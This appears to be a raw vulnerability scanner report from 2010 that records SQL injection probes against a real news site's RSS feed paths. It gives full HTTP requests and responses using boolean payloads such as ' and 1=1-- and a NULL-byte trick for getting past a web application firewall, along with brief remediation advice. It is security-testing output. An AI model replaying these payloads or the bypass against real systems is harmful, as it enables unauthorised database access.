GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:56 GMT
Connection: close
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:57 GMT
Date: Tue, 07 Dec 2010 23:18:57 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 23993338%20or%201%3d1--%20 and 23993338%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d1--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:03 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56823993338%20or%201%3d2--%20/200746.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:03 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 18638958%20or%201%3d1--%20 and 18638958%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d1--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56818638958%20or%201%3d2--%20/200747.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200747.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200747.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:19 GMT
Date: Tue, 07 Dec 2010 23:19:19 GMT
Content-Length: 424
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:29 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200748.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:29 GMT
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200748.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:33 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200748.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:12 GMT
Connection: close
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 424
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200749.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568/200749.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 65316758'%20or%201%3d1--%20 and 65316758'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d1--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:20 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d2--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:21 GMT
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:27 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47711278%20or%201%3d1--%20 and 47711278%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d1--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d2--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 87447082'%20or%201%3d1--%20 and 87447082'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi87447082'%20or%201%3d1--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:26 GMT
Connection: close
Request 2
GET /mngi87447082'%20or%201%3d2--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:26 GMT
Date: Tue, 07 Dec 2010 23:19:26 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 0
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:01 GMT
Connection: close
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:01 GMT
Date: Tue, 07 Dec 2010 23:21:01 GMT
Content-Length: 424
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:11 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 24161260'%20or%201%3d1--%20 and 24161260'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d1--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:59 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d2--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 35561059%20or%201%3d1--%20 and 35561059%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d1--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d2--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:08 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 33757705'%20or%201%3d1--%20 and 33757705'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d1--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d2--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 93704237'%20or%201%3d1--%20 and 93704237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi93704237'%20or%201%3d1--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:47 GMT
Connection: close
Request 2
GET /mngi93704237'%20or%201%3d2--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:48 GMT
Date: Tue, 07 Dec 2010 23:19:48 GMT
Content-Length: 424
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568/200764.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
